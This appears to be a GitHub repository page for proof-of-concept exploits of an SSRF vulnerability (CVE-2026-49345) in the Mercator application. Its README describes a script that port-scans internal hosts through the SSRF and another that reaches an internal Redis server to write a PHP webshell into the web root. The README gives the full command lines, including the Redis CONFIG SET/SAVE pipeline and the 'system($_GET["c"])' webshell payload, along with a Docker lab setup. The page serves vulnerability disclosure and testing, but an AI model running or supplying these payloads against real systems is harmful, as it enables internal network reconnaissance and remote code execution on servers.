Skip to content

hadhub/CVE-2026-49345-Mercator-SSRF

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Mercator SSRF

2 PoCs are available.

  • ssrf2scan.py : Perform a tcp scan using telnet scheme using gohper scheme
  • ssrf2rce.py : Perform RCE via webshell by exploiting a vulnerable redis services inside the same network of Mercator.
  • reset-lab.sh : Delete the webshell written by the ssrf2rce.py PoC.

To start a lab, used this commands :

After starting the Mercator Docker container, you need to add a second container for the vulnerable Redis instance :

See Mercator Installation

Port scan

python3 ssrf2scan.py --base http://IP_MERCATOR:PORT --user "$MERCATOR_USERNAME" --password "$MERCATOR_PASSWORD" --target 127.0.0.1 --ports 3306

Conditional RCE via Redis

docker run -d --name redis-poc --user 501:501 -p 127.0.0.1:6379:6379 -v /var/www/mercator:/var/www/mercator redis:latest redis-server --protected-mode no --save "" --appendonly no --enable-protected-configs yes
python3 ssrf2rce.py --base http://IP_MERCATOR:PORT --user "$MERCATOR_USERNAME" --password "$MERCATOR_PASSWORD" --redis 127.0.0.1:6379 --pipeline CONFIG SET dir /var/www/mercator/public ';' CONFIG SET dbfilename poc.php ';' SET poc $'\n\n<?php system($_GET["c"]); ?>\n\n' ';' SAVE

About

SSRF Discovered in Mercator

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors